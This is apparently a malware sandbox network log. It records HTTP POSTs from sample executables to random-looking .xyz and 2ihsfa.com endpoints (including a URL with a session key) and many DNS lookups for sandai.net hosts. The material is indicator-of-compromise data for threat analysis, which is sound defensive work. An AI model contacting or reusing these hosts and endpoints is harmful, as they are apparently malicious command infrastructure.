Date: Wed, 18 Nov 2020 16:04:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=daf10c1c42983f5583e0010c7cc621a3b1605715448; expires=Fri, 18-Dec-20 16:04:08 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db269360000c8379eabd000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0a0jGvK7TiZhyAux%2BZafuSXHOOXGaNdmxoGHcD6h9Q%2BRNoYtk%2F296SfL5JRO43RA%2FBB%2ByU2tUn%2FgTY7rKZb9ho2ibtY6RFVnK7YRt0BjnFMcyntAdg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42eceebefdc837-AMS
POST

http://8d96c6c8686c52e7.xyz/info/e

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 721
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d54b3a9c8b8899849100a8b5a35a8dcc51605715452; expires=Fri, 18-Dec-20 16:04:12 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db279d30000c83778b9b000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6ZKCda9aUpr8%2B76EOHBlDq2KTgpnHR3Hf5nwWGfrtChWUlNcVYXknOS66O9Vn6B0oVDfJkwflcTvibKIV2k86%2B533eJFmF25VXnTe2fuFa8vBOqx%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed09587ec837-AMS
POST

http://8d96c6c8686c52e7.xyz/info/w

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dbf4b438d015cbfbcf7b46c884746661b1605715453; expires=Fri, 18-Dec-20 16:04:13 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db27f2a0000c8378c131000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4%2FkOg9yuwyBNNmeUPFpZ4mEEoChGnu2tmE4GWgbqbLMReE0zE%2FX7cWcd6%2F5xxXA07QGnTTGB2CkTEJfMSTHRzcswG3aeWvRHAQzEz1xGdEGVWFVM7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed11db4ec837-AMS
POST

http://8d96c6c8686c52e7.xyz/info/g

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/g HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 285
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1332b12b7be89868dab1800045b7cf1b1605715456; expires=Fri, 18-Dec-20 16:04:16 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db28a320000c8379ba21000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LZMs76FxTj0POi13vdhkpirg%2FGgEdM%2FmtU4%2BJORGhxzyZXIoPVeKQNVpn1EIJ0lhONNwHa37phNlCe05mNRhmvZ4foJZ4vJwzwotW5Nh%2FczEYWMjDA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed2389c8c837-AMS
POST

http://8d96c6c8686c52e7.xyz/info/w

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=de891793ef9f3a1eca99f2b18b4ca99c61605715457; expires=Fri, 18-Dec-20 16:04:17 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db28f910000c8376d2ff000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ex%2B30UCKHQ5zl62xt505P9EyM0CM%2BEkO22Gglw6i1dUQGb8bUKQrRblsd4AuH%2BnMeAImgT7zbg7NIqQ4bHPas2S1UT%2FJX2oRy9OgXLX5lJ10dN5BIA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed2c1ca8c837-AMS
GET

http://8d96c6c8686c52e7.xyz/info/r

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

GET /info/r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d88d72b6e456798b1725fd17efd087e531605715459; expires=Fri, 18-Dec-20 16:04:19 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db295a10000c8378383a000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=BuOpBt%2BhDihRjTSx8akOc1yWGzLNuK9WVpMTSr5ba1eNmZnj3%2FfGOtsWY45JudOb3dGPxn8Ed%2B5pWeJQdJ3865HOTW%2BxCI0Q6sBQ7%2BdX7zilbVoDxw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed35c9f9c837-AMS
POST

http://8d96c6c8686c52e7.xyz/info/a

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/a HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 261
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dff45c6c72fa61bd1ab682f5ff2a19ac51605715462; expires=Fri, 18-Dec-20 16:04:22 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db2a0900000c8377aadc000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LX8k%2FilyBoaS6oEuzdMG4xzlRZ8Qkc5VOE53w29WOxyd4RlqrkF45NMvJM4Dpg%2BDnUClupOkF%2FcpWgdCzuhXwQYzNTR8cQORNHRYUCIrSKRJsI9fxw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed474f2ac837-AMS
POST

http://8d96c6c8686c52e7.xyz/info/w

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d66c8c0d96fbd21c99f7524b9a12ffdc31605715483; expires=Fri, 18-Dec-20 16:04:43 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db2f4c10000c8373f0ab000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=e%2BPG8vXF7gx4QfcTx9oJklf%2B7cu9ZaeeB0M1CIupTJyjnRJerTwBOiN%2BigR2pdmgybx2M3%2BYxo1EYw0wZYS07p6MkFQYxjtv9gvrAeCNMjG7KkiJgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42edce0e09c837-AMS
POST

http://8d96c6c8686c52e7.xyz/info/du

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/du HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 125
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:05:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d288e76a94b1bad801a873c40e867eb541605715516; expires=Fri, 18-Dec-20 16:05:16 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db3744e0000c8378f249000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kvJwHp9BufwJJursHbmuXA8LPsecYGixM30IyNAF%2FX2VjmXx%2F25cyoldSdak2yrmKAP5LWj%2BZekwiXyR5Q%2B7dWKclpIOq2IbCpcls3snCpIwFvUqEg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ee9a1b7dc837-AMS
POST

http://8d96c6c8686c52e7.xyz/info/w

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dd952f8f672d494d7b5597b4235ef68d51605715448; expires=Fri, 18-Dec-20 16:04:08 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db269ae00000b8893878000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LPtbQrKwIVWPhgQb32IzU0lP%2FnE849VJuo6JFMb596SUAfHC7duWduycjceVBMJ%2BRHY4Uk%2F36xuHFqrYLcWox28VBId2je6MM5%2BjxnFUei5IpaDc%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecef79740b88-AMS
POST

http://8d96c6c8686c52e7.xyz/info/w

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da159516699b6e51b742d5d956cbb99ff1605715451; expires=Fri, 18-Dec-20 16:04:11 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db277fc00000b88f0a4a000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SP%2BCnO7s%2BC143QKcg6ETigIZg6iG5T4l5h7szxzmWngwF34fB2gODNMeLVL0xY31RAsIv36PAYMFysoYONouve95oMVj%2F%2Fb4i0T%2Bb4rCP40u8AgQdw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed0659d70b88-AMS
DNS

www.facebook.com

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.27.35
DNS

e35654c2a64bf304.club

Remote address:

8.8.8.8:53

Request

e35654c2a64bf304.club

IN A

Response

e35654c2a64bf304.club

IN A

104.27.140.60

e35654c2a64bf304.club

IN A

172.67.209.249

e35654c2a64bf304.club

IN A

104.27.141.60
DNS

uehge4g6gh.2ihsfa.com

Remote address:

8.8.8.8:53

Request

uehge4g6gh.2ihsfa.com

IN A

Response

uehge4g6gh.2ihsfa.com

IN A

207.246.80.14
GET

http://uehge4g6gh.2ihsfa.com/api/fbtime

hjjgaa.exe

Remote address:

207.246.80.14:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:04:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=526772&key=843fbb08ba0d8f2b5e9a3e5c811acc2f

hjjgaa.exe

Remote address:

207.246.80.14:80

Request

POST /api/?sid=526772&key=843fbb08ba0d8f2b5e9a3e5c811acc2f HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:04:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
DNS

8D96C6C8686C52E7.xyz

Remote address:

8.8.8.8:53

Request

8D96C6C8686C52E7.xyz

IN A

Response

8D96C6C8686C52E7.xyz

IN A

172.67.204.197

8D96C6C8686C52E7.xyz

IN A

104.18.43.86

8D96C6C8686C52E7.xyz

IN A

104.18.42.86
GET

http://8D96C6C8686C52E7.xyz/info/ddd

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

GET /info/ddd HTTP/1.1
Host: 8D96C6C8686C52E7.xyz
Accept: */*

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d04052e5833a450e932c741315621774b1605715491; expires=Fri, 18-Dec-20 16:04:51 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db311000000bdf08b263000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=CQ7uPNblEaYyegt4tkAbUjITVezqUwZ%2BmLAGMRN75CvnMYTH0c5fc57vv2Qt3NPn%2FXOHNqHZkoROhbyp8zoFguBq2H7BKU7XPDKE2ShboEh7iXujLA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42edfb384bbdf0-AMS
DNS

hub5pnc.hz.sandai.net

Remote address:

8.8.8.8:53

Request

hub5pnc.hz.sandai.net

IN A

Response

hub5pnc.hz.sandai.net

IN CNAME

hub5pnc.sandai.net

hub5pnc.sandai.net

IN CNAME

cnc.hub5pnc.sandai.net

cnc.hub5pnc.sandai.net

IN A

47.92.100.53

cnc.hub5pnc.sandai.net

IN A

47.92.99.221
DNS

hub5pn.hz.sandai.net

Remote address:

8.8.8.8:53

Request

hub5pn.hz.sandai.net

IN A

Response

hub5pn.hz.sandai.net

IN CNAME

hub5pn.sandai.net

hub5pn.sandai.net

IN CNAME

cnc.hub5pn.sandai.net

cnc.hub5pn.sandai.net

IN A

118.212.146.20

cnc.hub5pn.sandai.net

IN A

118.212.146.21

cnc.hub5pn.sandai.net

IN A

153.3.232.174

cnc.hub5pn.sandai.net

IN A

211.91.242.37

cnc.hub5pn.sandai.net

IN A

58.144.251.1

cnc.hub5pn.sandai.net

IN A

111.206.4.176

cnc.hub5pn.sandai.net

IN A

58.144.251.2

cnc.hub5pn.sandai.net

IN A

211.91.242.38

cnc.hub5pn.sandai.net

IN A

157.255.225.49

cnc.hub5pn.sandai.net

IN A

111.206.4.164

cnc.hub5pn.sandai.net

IN A

157.255.225.53

cnc.hub5pn.sandai.net

IN A

153.3.232.175
DNS

hub5u.hz.sandai.net

Remote address:

8.8.8.8:53

Request

hub5u.hz.sandai.net

IN A

Response

hub5u.hz.sandai.net

IN CNAME

hub5u.sandai.net

hub5u.sandai.net

IN CNAME

bgphub5u.sandai.net

bgphub5u.sandai.net

IN A

39.100.9.39

bgphub5u.sandai.net

IN A

39.98.57.143

bgphub5u.sandai.net

IN A

47.92.75.245
DNS

relay.phub.hz.sandai.net

Remote address:

8.8.8.8:53

Request

relay.phub.hz.sandai.net

IN A

Response
DNS

hub5c.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hub5c.hz.sandai.net

IN A

Response

hub5c.hz.sandai.net

IN CNAME

hub5c.sandai.net

hub5c.sandai.net

IN CNAME

hub4t.sandai.net

hub4t.sandai.net

IN CNAME

cnchub5sr.sandai.net

cnchub5sr.sandai.net

IN CNAME

cncidx.m.hub.sandai.net

cncidx.m.hub.sandai.net

IN A

140.206.225.138

cncidx.m.hub.sandai.net

IN A

123.125.221.44

cncidx.m.hub.sandai.net

IN A

140.206.225.244

cncidx.m.hub.sandai.net

IN A

123.125.221.6

cncidx.m.hub.sandai.net

IN A

123.125.221.72

cncidx.m.hub.sandai.net

IN A

140.206.225.169
DNS

pmap.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

pmap.hz.sandai.net

IN A

Response

pmap.hz.sandai.net

IN CNAME

pmap.sandai.net

pmap.sandai.net

IN A

47.97.7.140
DNS

dream.pics

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

dream.pics

IN A

Response

dream.pics

IN A

8.208.85.95
DNS

hub5idx.shub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hub5idx.shub.hz.sandai.net

IN A

Response

hub5idx.shub.hz.sandai.net

IN CNAME

hub5t.sandai.net

hub5t.sandai.net

IN CNAME

hub4t.sandai.net

hub4t.sandai.net

IN CNAME

cnchub5sr.sandai.net

cnchub5sr.sandai.net

IN CNAME

cncidx.m.hub.sandai.net

cncidx.m.hub.sandai.net

IN A

140.206.225.138

cncidx.m.hub.sandai.net

IN A

140.206.225.169

cncidx.m.hub.sandai.net

IN A

140.206.225.244

cncidx.m.hub.sandai.net

IN A

123.125.221.6

cncidx.m.hub.sandai.net

IN A

123.125.221.72

cncidx.m.hub.sandai.net

IN A

123.125.221.44
DNS

hubstat.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hubstat.hz.sandai.net

IN A

Response
DNS

hub5pr.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hub5pr.hz.sandai.net

IN A

Response
DNS

imhub5pr.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

imhub5pr.hz.sandai.net

IN A

Response
DNS

score.phub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

score.phub.hz.sandai.net

IN A

Response
DNS

imhub5pr.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

imhub5pr.hz.sandai.net

IN A

Response
DNS

score.phub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

score.phub.hz.sandai.net

IN A

Response
DNS

score.phub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

score.phub.hz.sandai.net

IN A

Response
DNS

imhub5pr.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

imhub5pr.hz.sandai.net

IN A

Response
DNS

score.phub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

score.phub.hz.sandai.net

IN A

Response
DNS

imhub5pr.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

imhub5pr.hz.sandai.net

IN A

Response
DNS

score.phub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

score.phub.hz.sandai.net

IN A

Response
DNS

score.phub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

score.phub.hz.sandai.net

IN A

Response
DNS

imhub5pr.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

imhub5pr.hz.sandai.net

IN A

Response

hub5pr.hz.sandai.net

IN CNAME

hub5pr.sandai.net

hub5pr.sandai.net

IN CNAME

bgphub5pr.sandai.net

bgphub5pr.sandai.net

IN A

47.92.195.246

bgphub5pr.sandai.net

IN A

47.92.169.85

bgphub5pr.sandai.net

IN A

47.92.194.216

bgphub5pr.sandai.net

IN A

47.92.125.145

bgphub5pr.sandai.net

IN A

47.92.39.6

bgphub5pr.sandai.net

IN A

47.92.171.207
DNS

imhub5pr.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

imhub5pr.hz.sandai.net

IN A

Response

hub5sr.shub.hz.sandai.net

IN CNAME

hub5t.sandai.net

hub5t.sandai.net

IN CNAME

hub4t.sandai.net

hub4t.sandai.net

IN CNAME

cnchub5sr.sandai.net

cnchub5sr.sandai.net

IN CNAME

cncidx.m.hub.sandai.net

cncidx.m.hub.sandai.net

IN A

123.125.221.6

cncidx.m.hub.sandai.net

IN A

140.206.225.138

cncidx.m.hub.sandai.net

IN A

123.125.221.72

cncidx.m.hub.sandai.net

IN A

140.206.225.169

cncidx.m.hub.sandai.net

IN A

123.125.221.44

cncidx.m.hub.sandai.net

IN A

140.206.225.244
DNS

hubstat.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hubstat.hz.sandai.net

IN A

Response

hubstat.hz.sandai.net

IN CNAME

hubstat.sandai.net

hubstat.sandai.net

IN CNAME

cnchubstat.sandai.net

cnchubstat.sandai.net

IN A

140.206.225.232

cnchubstat.sandai.net

IN A

140.206.225.136
DNS

hub5p.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hub5p.hz.sandai.net

IN A

Response

hub5p.hz.sandai.net

IN CNAME

hub5p.sandai.net

hub5p.sandai.net

IN CNAME

bgp.hub5p.sandai.net

bgp.hub5p.sandai.net

IN A

47.92.157.216

bgp.hub5p.sandai.net

IN A

47.92.74.65

bgp.hub5p.sandai.net

IN A

47.92.75.239
DNS

hub5sr.shub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hub5sr.shub.hz.sandai.net

IN A

Response

hub5sr.shub.hz.sandai.net

IN CNAME

hub5t.sandai.net

hub5t.sandai.net

IN CNAME

hub4t.sandai.net

hub4t.sandai.net

IN CNAME

cnchub5sr.sandai.net

cnchub5sr.sandai.net

IN CNAME

cncidx.m.hub.sandai.net

cncidx.m.hub.sandai.net

IN A

123.125.221.44

cncidx.m.hub.sandai.net

IN A

140.206.225.169

cncidx.m.hub.sandai.net

IN A

140.206.225.244

cncidx.m.hub.sandai.net

IN A

123.125.221.6

cncidx.m.hub.sandai.net

IN A

123.125.221.72

